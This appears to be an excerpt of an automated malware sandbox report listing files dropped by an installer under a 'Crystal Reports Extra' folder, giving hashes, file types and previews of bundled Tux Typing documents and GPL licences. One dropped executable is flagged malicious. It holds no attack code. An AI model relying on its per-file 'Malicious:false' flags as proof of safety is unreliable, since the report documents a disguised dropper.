                                                          SSDEEP:192:ZwDpWkkNH3WhWdWjPpAcWaprsKtFd2W7688zIOKBRqB:ZwDpWkCXWhWdWbp7WapTtyW7n0oRqB
                                                          MD5:8FB227C6E1B6375D0AFD0DEED289E0B4
                                                          SHA1:8C30D1E996821D2BA9E84E86214F24CBC094A005
                                                          SHA-256:C4ADD274C0889E61F7F6B591C601842F9F9C3E7C17D36E4374AFEF4E1F899A50
                                                          SHA-512:6BC7638BE91AFD98E0DC37B91007C1997B32CAFDFF524A6B4C06BC5DD61E28E9D184A2B662DBF55765F88CA3BB2DF3C7EBB00CA6287A011001C2D1AF1FA279AF
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Tux Typing 1.8.1.04 Apr 2010..NOTE - this document is reasonably correct but not completely current..It will updated as the maintainer's time allows. For GNU/Linux users, you.need the "*dev" files for the SDL libs listed below, and should have the.dev file for SDL_Pango if you want to display non-Western text. TuxType.will build successfully, but without SDL_Pango support, if this header/lib.is not found...Most GNU/Linux users can install Tux Typing with their distribution's .package manager (such as apt or yum). To build from source, you can grab.the tuxtype_w_fonts*tar.gz, untar it, and build with "./configure; make;.make install". You do not need Autotools unless you are building from.a Subversion repository checkout. MacOSX users and Windows users can.install with very user-friendly binary installer packages - DSB...The current web site is http://www.tux4kids.com..The developer mailing list is tux4kids-tuxtype-dev@lists.alioth.debian.org..Feel free to email with any feedback or
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\doc\lesson_scripting_reference.html (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:HTML document, ASCII text, with very long lines
                                                          Category:dropped
                                                          Size (bytes):36160
                                                          Entropy (8bit):4.7594335666742
                                                          Encrypted:false
                                                          SSDEEP:192:n6RclftgswUxW/UJT57VEhtiS06VkndpfZsZKZgZjZo9qR9ILWZUZyZFZaZMZ7ZJ:BTgswUR7VEhGyBN
                                                          MD5:AADCC5C24B7AA66773A82C8DCF90DC3F
                                                          SHA1:35AB43174C9489801E957ED0E19E50ABD6ED655D
                                                          SHA-256:9C8C1508E4255C98C0ECBFFB6184C50711E32B2B150346CE2B53AA58BD5749DC
                                                          SHA-512:5127B56915677B5E1E17C8FB9B8B9B26BCA07B53E9585437B38B1E94F422EDA5ED7B59BA86DFBFE0247E75A8351C61BAE505874AE3D2A3410275AA51154CC6C9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: <HTML>.<BODY>.<H1>TuxType Custom Scripting Reference</H1>.<h3>Contents</h3>.<a href="#introduction">Introduction</a><BR>.<a href="#locations">File Locations</a><BR>.<a href="#basics">The Basics</a><BR>.<a href="#hierarchy">XML Tag Hierarchy</a><BR>.<a href="#samples">Samples</a><BR>.<a href="#tags">Tag Reference</a><BR>..<BR><BR><BR><BR>.<a name="introduction">.<h4>Introduction</h4>.Tuxtype lessons can be customized with relative ease. It just takes a little<BR>.imagination, and a text editor.<BR>.<BR>.<a name="locations">.<h4>File Locations</h4>.Tuxtype first looks in your language (theme) directory for lesson files<BR>.<B>(Non-English Users Only)</B><BR>.eg: (&lt;TuxType directory&gt;/data/themes/&lt;language&gt;/scripts/),<BR><BR>.or in the default directory if you are using TuxType in english<BR>.(&lt;TuxType directory&gt;/data/scripts/)<BR>.<BR>.If there is not a scripts folder in your language (theme) directory, You may<BR>.safely create it<BR>.<BR>.<a name="basics">.<h4>The Ba
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\fonts\Kedage-n.ttf (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:TrueType Font data, 16 tables, 1st "GDEF", 26 names, Unicode
                                                          Category:dropped
                                                          Size (bytes):100056
                                                          Entropy (8bit):6.938355019015695
                                                          Encrypted:false
                                                          SSDEEP:1536:f2IGmE7hw5dfZZx1NoA/U5c/H4yQcAa+CrSV/DiU+XB6xAY3DG2NLyPGfGT85Sfx:f2xwLZZxb/U5PyQnaZ2ewrDGiLyPv
                                                          MD5:16024BEA0EB7A59995C59EDF5DF20D8F
                                                          SHA1:33710D5CEEA4684CE09C4616DBE03B881058640F
                                                          SHA-256:9AC4C694374E9BDD49C74E5852A990EAF1256D92DE859E6F2CBC42272102C1A5
                                                          SHA-512:C3B7E12D526745B189AA1606B14E950E1F7913491EF105A8264705E699E0352830F541190477403F8FC3616F1DE6CA9CC111D6A9C96505587B3B0BCCFBABEB0A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\fonts\is-878RF.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:TrueType Font data, 20 tables, 1st "GDEF", 16 names, Macintosh, Copyright (c) 2003, Automatic Control Equipments, Pune, INDIA. - under General Public LicenseLo
                                                          Category:dropped
                                                          Size (bytes):64760
                                                          Entropy (8bit):6.514217361307989
                                                          Encrypted:false
                                                          SSDEEP:1536:/JkO5XuoOM3qn3RDWuLHmBET8La0O5dGXwZR:x75Xu5n3BWubmST8ufdGAz
                                                          MD5:2E6070E9B26AC1377F9208C320D62591
                                                          SHA1:A5C6D4AC71748C0979968A40180A575F611C73D4
                                                          SHA-256:9499F3B7446292DC164A7ACDABD8B6B38AE3D94B9D092004C1ED48DCBB83BB44
                                                          SHA-512:06EB42262382E78D83D48D554EA4453AFB36887C57643CED6128139B71D4465544B79689D939DE52F6EB426788153F71B79F1E3D70563D51632A12D743E5714F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\fonts\is-DJ1Q7.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:TrueType Font data, 16 tables, 1st "GDEF", 26 names, Unicode
                                                          Category:dropped
                                                          Size (bytes):100056
                                                          Entropy (8bit):6.938355019015695
                                                          Encrypted:false
                                                          SSDEEP:1536:f2IGmE7hw5dfZZx1NoA/U5c/H4yQcAa+CrSV/DiU+XB6xAY3DG2NLyPGfGT85Sfx:f2xwLZZxb/U5PyQnaZ2ewrDGiLyPv
                                                          MD5:16024BEA0EB7A59995C59EDF5DF20D8F
                                                          SHA1:33710D5CEEA4684CE09C4616DBE03B881058640F
                                                          SHA-256:9AC4C694374E9BDD49C74E5852A990EAF1256D92DE859E6F2CBC42272102C1A5
                                                          SHA-512:C3B7E12D526745B189AA1606B14E950E1F7913491EF105A8264705E699E0352830F541190477403F8FC3616F1DE6CA9CC111D6A9C96505587B3B0BCCFBABEB0A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\fonts\is-K1NF7.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:TrueType Font data, 16 tables, 1st "GDEF", 14 names, Macintosh
                                                          Category:dropped
                                                          Size (bytes):76600
                                                          Entropy (8bit):6.3178993263494165
                                                          Encrypted:false
                                                          SSDEEP:1536:V6ksURZ3E0fWPnVV9X15POG/EVy0Mft4tb1a7Il/6gbScGTDI1uw44f:VpvPRfWPVXj1EVut4V1a7GygGgr
                                                          MD5:4808DDF3A48DC3B6A4F93DBD3D17EB4E
                                                          SHA1:0629A606CF59C08EBCF53DCD9535AE0D30755903
                                                          SHA-256:5EA6D5AF952385A37B83EB3821253D46542AF509673ADD90075E7FEAF1D8B453
                                                          SHA-512:F48B68DC4F4C90125347A8327F8D5C91636630528B5B033045401C784B088FD00FC812B978D4466779419C3EC1AD726B1DA41308079E86A1DB62FBB7E8CAEE88
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\fonts\is-K99HI.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:TrueType Font data, 20 tables, 1st "GDEF", 16 names, Macintosh, Copyright (c) 2001, Automatic Control Equipments, Pune, INDIA. - under General Public LicenseLo
                                                          Category:dropped
                                                          Size (bytes):58240
                                                          Entropy (8bit):5.620492732134304
                                                          Encrypted:false
                                                          SSDEEP:1536:Q42z0R0cX1S641B6rG+Xp+jPAh7n/pOkfH4r:2QWcXEpX6a+Xp+jo1/pOUHi
                                                          MD5:CC2EE1B756FC72A58C52294854FA35D7
                                                          SHA1:58E6658240C710DD7EB9DE46FDD8515390219196
                                                          SHA-256:B9920211B0E1D19B55FBEF3CB602248FA8F0FF87598878769188209CBB7F6EAC
                                                          SHA-512:1BCC638F7D8901CFE4DCA2983F9C6EFB31C7A5FCAEEEAE06F6252E428111E709F3EDFA55868FFEA412D7BB10F995D81AC7E0C36BA37F8AABB6C985B5B2DC15EF
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\fonts\lohit_hi.ttf (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:TrueType Font data, 16 tables, 1st "GDEF", 14 names, Macintosh
                                                          Category:dropped
                                                          Size (bytes):76600
                                                          Entropy (8bit):6.3178993263494165
                                                          Encrypted:false
                                                          SSDEEP:1536:V6ksURZ3E0fWPnVV9X15POG/EVy0Mft4tb1a7Il/6gbScGTDI1uw44f:VpvPRfWPVXj1EVut4V1a7GygGgr
                                                          MD5:4808DDF3A48DC3B6A4F93DBD3D17EB4E
                                                          SHA1:0629A606CF59C08EBCF53DCD9535AE0D30755903
                                                          SHA-256:5EA6D5AF952385A37B83EB3821253D46542AF509673ADD90075E7FEAF1D8B453
                                                          SHA-512:F48B68DC4F4C90125347A8327F8D5C91636630528B5B033045401C784B088FD00FC812B978D4466779419C3EC1AD726B1DA41308079E86A1DB62FBB7E8CAEE88
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\fonts\lohit_pa.ttf (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:TrueType Font data, 20 tables, 1st "GDEF", 16 names, Macintosh, Copyright (c) 2001, Automatic Control Equipments, Pune, INDIA. - under General Public LicenseLo
                                                          Category:dropped
                                                          Size (bytes):58240
                                                          Entropy (8bit):5.620492732134304
                                                          Encrypted:false
                                                          SSDEEP:1536:Q42z0R0cX1S641B6rG+Xp+jPAh7n/pOkfH4r:2QWcXEpX6a+Xp+jo1/pOUHi
                                                          MD5:CC2EE1B756FC72A58C52294854FA35D7
                                                          SHA1:58E6658240C710DD7EB9DE46FDD8515390219196
                                                          SHA-256:B9920211B0E1D19B55FBEF3CB602248FA8F0FF87598878769188209CBB7F6EAC
                                                          SHA-512:1BCC638F7D8901CFE4DCA2983F9C6EFB31C7A5FCAEEEAE06F6252E428111E709F3EDFA55868FFEA412D7BB10F995D81AC7E0C36BA37F8AABB6C985B5B2DC15EF
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\fonts\lohit_ta.ttf (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:TrueType Font data, 20 tables, 1st "GDEF", 16 names, Macintosh, Copyright (c) 2003, Automatic Control Equipments, Pune, INDIA. - under General Public LicenseLo
                                                          Category:dropped
                                                          Size (bytes):64760
                                                          Entropy (8bit):6.514217361307989
                                                          Encrypted:false
                                                          SSDEEP:1536:/JkO5XuoOM3qn3RDWuLHmBET8La0O5dGXwZR:x75Xu5n3BWubmST8ufdGAz
                                                          MD5:2E6070E9B26AC1377F9208C320D62591
                                                          SHA1:A5C6D4AC71748C0979968A40180A575F611C73D4
                                                          SHA-256:9499F3B7446292DC164A7ACDABD8B6B38AE3D94B9D092004C1ED48DCBB83BB44
                                                          SHA-512:06EB42262382E78D83D48D554EA4453AFB36887C57643CED6128139B71D4465544B79689D939DE52F6EB426788153F71B79F1E3D70563D51632A12D743E5714F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\history.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):421792
                                                          Entropy (8bit):5.89089312168092
                                                          Encrypted:false
                                                          SSDEEP:6144:IBv/Y6oqGY2NID1MMf07QxjopowBvBBvm:IBv/Y6oiYIup7QVopowBvBBvm
                                                          MD5:10F4396344E93CE328529A26CC026082
                                                          SHA1:51895B0BE7B772EBE747336E4E0F57D8BBC5D277
                                                          SHA-256:5CA366D8C7102434E6D8E80C30BA3B4FD99AB5082C629C95D7F870DD8F0F8A27
                                                          SHA-512:770A801011E2FCA3052AF437CAE4930A1BCAF2CAE55FFC7A29249196B26AF7599551BDE4C7CEBDB6472E1A400182E711B9590CBAC90A9F28C7F10FBE37FA064D
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: GNU GENERAL PUBLIC LICENSE. Version 3, 29 June 2007.. Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>. Everyone is permitted to copy and distribute verbatim copies. of this license document, but changing it is not allowed... Preamble.. The GNU General Public License is a free, copyleft license for.software and other kinds of works... The licenses for most software and other practical works are designed.to take away your freedom to share and change the works. By contrast,.the GNU General Public License is intended to guarantee your freedom to.share and change all versions of a program--to make sure it remains free.software for all its users. We, the Free Software Foundation, use the.GNU General Public License for most of our software; it applies also to.any other work released this way by its authors. You can apply it to.your programs, too... When we speak of free software, we are referring to
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\imageformats\is-0V44S.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):229376
                                                          Entropy (8bit):6.403618531896028
                                                          Encrypted:false
                                                          SSDEEP:3072:hNj+F2PYTwAEbc8NnQPgd/5LV9Saotx2xhz4lzZoIWpJatWCETGBxdxz0dIAJo9o:NBQdgdhLV02m8pJYETywe9sibJZw
                                                          MD5:B7C7BC0C790C4BA8AE2E7C8608710C3E
                                                          SHA1:8CBE580B7D6C67963563ED69495FF6387EDB0F0E
                                                          SHA-256:6C8B148B4A223D9372D7B56A2BFD5AF5DB0AB9BEF74C3423DE8B2D4E335C3E85
                                                          SHA-512:E60381D44D72A61D73E3959FDB2C8857E6130A0C3E5CAEA64EC55B9C4C41B33FFB347585C7B02501BF06F21B699CB8CB2D48DB5A689BD295BDB06E6CE82C7A27
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\imageformats\is-GS64B.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):50688
                                                          Entropy (8bit):6.258238022202296
                                                          Encrypted:false
                                                          SSDEEP:1536:LBv1ky0ucs9y43wtHs9AjOQ0oHmfFDbJfhSuH:LBq4pyv29wMoHkFDbJfhf
                                                          MD5:B690FDD8FCD1C2700F35388E9B1E5974
                                                          SHA1:51669DD917B3F81B7D4526AF36938DCF8C0AA7D9
                                                          SHA-256:3D5A5623CDEA823A14102A43CAC78902A73840434BA0FE9447AA8F37F887AF4A
                                                          SHA-512:D8F63A1893211D958A47EDDC9CFC5DE7F8FDF7F530662722D2176C8CAF4B8D0791F43BB59048FB075C7F820FB86BD8C79FE96696392A7E336860638A3CEE6B9E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\imageformats\qgif4.dll (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):50688
                                                          Entropy (8bit):6.258238022202296
                                                          Encrypted:false
                                                          SSDEEP:1536:LBv1ky0ucs9y43wtHs9AjOQ0oHmfFDbJfhSuH:LBq4pyv29wMoHkFDbJfhf
                                                          MD5:B690FDD8FCD1C2700F35388E9B1E5974
                                                          SHA1:51669DD917B3F81B7D4526AF36938DCF8C0AA7D9
                                                          SHA-256:3D5A5623CDEA823A14102A43CAC78902A73840434BA0FE9447AA8F37F887AF4A
                                                          SHA-512:D8F63A1893211D958A47EDDC9CFC5DE7F8FDF7F530662722D2176C8CAF4B8D0791F43BB59048FB075C7F820FB86BD8C79FE96696392A7E336860638A3CEE6B9E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\imageformats\qjpeg4.dll (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):229376
                                                          Entropy (8bit):6.403618531896028
                                                          Encrypted:false
                                                          SSDEEP:3072:hNj+F2PYTwAEbc8NnQPgd/5LV9Saotx2xhz4lzZoIWpJatWCETGBxdxz0dIAJo9o:NBQdgdhLV02m8pJYETywe9sibJZw
                                                          MD5:B7C7BC0C790C4BA8AE2E7C8608710C3E
                                                          SHA1:8CBE580B7D6C67963563ED69495FF6387EDB0F0E
                                                          SHA-256:6C8B148B4A223D9372D7B56A2BFD5AF5DB0AB9BEF74C3423DE8B2D4E335C3E85
                                                          SHA-512:E60381D44D72A61D73E3959FDB2C8857E6130A0C3E5CAEA64EC55B9C4C41B33FFB347585C7B02501BF06F21B699CB8CB2D48DB5A689BD295BDB06E6CE82C7A27
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-1UL10.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):41984
                                                          Entropy (8bit):6.132770955803513
                                                          Encrypted:false
                                                          SSDEEP:768:bgaowTgGpoQHcE4UJmcCqr7/rz/WGc4kedF0emlBQQhpjxH:bgsppvHc1Cb7ldnmlBQkdH
                                                          MD5:4D233A220F91DE3B1510D017B5481942
                                                          SHA1:C59F449B0D09127D18268E7B07DA3F7D749B2720
                                                          SHA-256:08336089E280805C8AC89F7476526F944B5868C014748B6DC29F65167E9E3AB0
                                                          SHA-512:A86A1F9B5D160813C6E2F771962F303428604057B9613021BF7844C1204CFCA0A18571A28D950D7999ACC4ECDE0605095F9A460A9B79FE2BBE02F080C2683923
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-33ENG.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):182365
                                                          Entropy (8bit):6.791628337519772
                                                          Encrypted:false
                                                          SSDEEP:3072:FiP8zpgWMwBsaEcWfsUGPWTSMqqDVw7P3FwBP1ELFy:Fu8NsgsidwxqqDVMFwBaFy
                                                          MD5:854C550450BEDDEBAAFE1DD74F073641
                                                          SHA1:3DB1545773EA7756D6A87B3693148ABCD1CDAB86
                                                          SHA-256:8561D32E30B3DEC9FFD24B1BD87E96444FD6D3D304D64F80C6D99E112411DC48
                                                          SHA-512:42AF4079F184A0F8E22689F55DFA225F10B20FF8C0816D728CE022573E5EF1F1412B87000F0EF375D7DFC2A1D734A2047D539597EA4FE8EF1D5A2895053C50D1
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-5F8P5.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):36352
                                                          Entropy (8bit):6.027050012874634
                                                          Encrypted:false
                                                          SSDEEP:768:bKZB2wewH8k43RncCqCbj9zAwLc0N+eD5JemQRR5Q7:bKZr5H8VmuECDGmQRR5Q7
                                                          MD5:CF2571C125FA1D2EC55B9977054F380A
                                                          SHA1:91014DD50F0EEB0D3D1FAED77541C76A05B712B8
                                                          SHA-256:02B817B6DB18DB2DFCCEFDD08EED64A696E2BF326F4120EE7E93AE6AA73BCCB3
                                                          SHA-512:A95BF3436EA2FAC443924C5FC31FCD4337A44702EF38CA82D744474301E53F14721EAEB0F21E515CCFF8569E7B7D81107FB5A4CF2AE485CD4A5D2DC95DAE8F9B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-5P6B9.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):120774
                                                          Entropy (8bit):6.037077757732975
                                                          Encrypted:false
                                                          SSDEEP:3072:nPE0Yx2cwD/Dtixvr6FkTwCD4N8FBKd8UR:sMzD/amFE4NQKd8UR
                                                          MD5:082A8171C726E58C1618DA3781AB7833
                                                          SHA1:5D74E7F8F5E14C1A70331A03456C68BB33AC17E2
                                                          SHA-256:AE1A1179289D1AB3B406F4BB347284464123C51BE50C1BCF38F2B5DD691E065C
                                                          SHA-512:837433AA29DFF1BD35AEB800B8DC69FB881BB2C435BF5BBA0AD7E809AD4CEA765B179DB4024A53F92E6B905FC964F23ED79949FA84424F864BBB88F140BD8682
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-7MTO8.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):4910592
                                                          Entropy (8bit):6.572031041695352
                                                          Encrypted:false
                                                          SSDEEP:49152:dYQUcTX0/fq7b81I89fNkiiD3khqwqREQDfqtd4keAG4/lqQNOhw5XlAzmGLateC:5zB7b8O8QZrjwwhw5XlACGm8CtxARti
                                                          MD5:11DD538F1BF5F174834DBA334964A691
                                                          SHA1:3B080FA94C71CFAB65A0CD407EACAC4C2B1B2378
                                                          SHA-256:1BC4B73613228169EF7F57222EF36A6D9B3A2F3347EFA2228C53DC3B83559888
                                                          SHA-512:8E0A0455BDECBA073B06BE610917C71B6082745DF91B34C2663BC8D86361E71EA8FFF3D222E087AA3560A1AEE3455CA1DC7F2957726D86B001F4124DE220F911
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-AFSCM.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):46592
                                                          Entropy (8bit):6.294286952115658
                                                          Encrypted:false
                                                          SSDEEP:768:BZIF0ff+vrzUHQH/E4zR2cCqz7iDz3Kocq8eeIKKem+nH3g/i3/:BWFsf+vrzUwH/15EzFeIWm+H3R3
                                                          MD5:84E8E72572D53558D52403011FA0D388
                                                          SHA1:865160DA7DBFAAEA224541EB44E9430E1A7B7B20
                                                          SHA-256:CA717B5CF2A7B0E047AABAD985C631278941C58F16E2E9650CA12C3A331FCD4F
                                                          SHA-512:47EE932BFA4EE3C51C3828EF8C6923E5B946966AD8E255BC2C53A60443AA2D4AB17521F21912A6F0469C7898D6543DC4B1783A86DDB5A84568818A7B37EC3992
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-B5IQO.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):69632
                                                          Entropy (8bit):5.9471839268980276
                                                          Encrypted:false
                                                          SSDEEP:1536:1qkfBMFLAlVQtlJR5E7kGJasMaooupW51+SXKl6U22Ol2B:RZ4LRa7ksasM3f4C6d2Ol2B
                                                          MD5:8E8285AAC0EF77A6CEDE53EAFE9C5298
                                                          SHA1:8A4715C1C8591B83B925282AF5BA72832C1CA0FC
                                                          SHA-256:3A94A8E5F9AB0ECA82611F95DC78C07C5093574C772B9C19D590F8E959191973
                                                          SHA-512:04F24CFA4F187FBE897033359EB3A2DA19C4225B514E0D6EE269D741C8BF86D9F7A5860AE2DE676DF1748C0D64CCB9DD58758CBE1524FF938C99224AFD30997F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-FCT1V.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):80653
                                                          Entropy (8bit):5.935029812256724
                                                          Encrypted:false
                                                          SSDEEP:1536:K7jqZI3jgg9IJgo+wrcKl8l2gdejHL8jT7x8ZKQi3uh:yUojggfo+wgl2gGHLYXx80T3uh
                                                          MD5:266FA5BAC8FAB45A57B3EB68495334F4
                                                          SHA1:C845B88A5F2279E348886E4D6246F855ACAA85B9
                                                          SHA-256:C8A3B86D6E930B21F428A3CAC3CC8FB432716D16043824DF886731565BFE8A23
                                                          SHA-512:EF8CAEF0A926865D4B1FE0CE51DC9542B814EB76392F85895A042AC514C529426519C83BCEC2EB976848D174D504E2852FA854C06A70D21F4E16DEBD533E3D0A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-HRO44.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):232976
                                                          Entropy (8bit):6.644092741800531
                                                          Encrypted:false
                                                          SSDEEP:6144:VBx0S/dXV86pr06/oG5NMR2jzm1YunTcUmAe0I70s0cYJyUqQmoUjW2v4ZzuFdA:hldXVjTD/m1YunTcZAe0I70s0cYQUqoX
                                                          MD5:A80D629D6329DC31D5CB1157D853AFAB
                                                          SHA1:A2FA781452106CDF17A83E3E59C6FE50D557E62C
                                                          SHA-256:500EE04865DBB7BEB9474E0C2AEBD6713DF4407C849EC134457C7D0CA289FAF0
                                                          SHA-512:4E0253615D4C3C418B93547370F416EDF5326BF66E3A5872C687B129E65E5967DC3D4AE97CF524CA5E77327B0CE07D93BA63470D541614A6685EBD26E0C7427B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-JEA3R.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):15099
                                                          Entropy (8bit):4.490145322936716
                                                          Encrypted:false
                                                          SSDEEP:192:s4HVPM3N2zi6547iYOE6k+jLPv4IdQQXyAOiDaoL8HZwM3fxEq/Sl4eAxjf+6:s4Hmv7iE6kY4I9yAO2NL8OMBI4eAxTV
                                                          MD5:D13ADE1829C8B1A1621DB24D91F2D082
                                                          SHA1:A7BD24E809EF9BE6A37EF2BD01D23D4465E979DD
                                                          SHA-256:079952DC637DBAA9806C40A001BF5837079ADE9066F8AA18C80D23507B7E3DA3
                                                          SHA-512:33FCD64FB4881801AC269A4065C2223C0A02EEDD1132EDC0E92EF35CDCC96DB669676681C26FBF3605DD1E8982919BECA1E644935F0C2B39537CD8D2886F41BC
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: GNU GENERAL PUBLIC LICENSE....Version 2, June 1991....Copyright (C) 1989, 1991 Free Software Foundation, Inc. 51 Franklin St, Fifth..Floor, Boston, MA 02110-1301 USA Everyone is permitted to copy and distribute..verbatim copies of this license document, but changing it is not allowed.....Preamble....The licenses for most software are designed to take away your freedom to share..and change it. By contrast, the GNU General Public License is intended to..guarantee your freedom to share and change free software--to make sure the..software is free for all its users. This General Public License applies to most..of the Free Software Foundation's software and to any other program whose..authors commit to using it. (Some other Free Software Foundation software is..covered by the GNU Library General Public License instead.) You can apply it to..your programs, too.....When we speak of free software, we are referring to freedom, not price. Our..General Public Licenses are designed to make sure tha
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-KTI9L.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):32585
                                                          Entropy (8bit):5.416596489081668
                                                          Encrypted:false
                                                          SSDEEP:384:5735N1fmZFO+S2uCtA2ostKbKSGQWlVsMb9XaVuXYA4iYG+mbe3FhEKoafNDhwrc:+6AuBOgPW3dasqiYGxq3FmKhrh
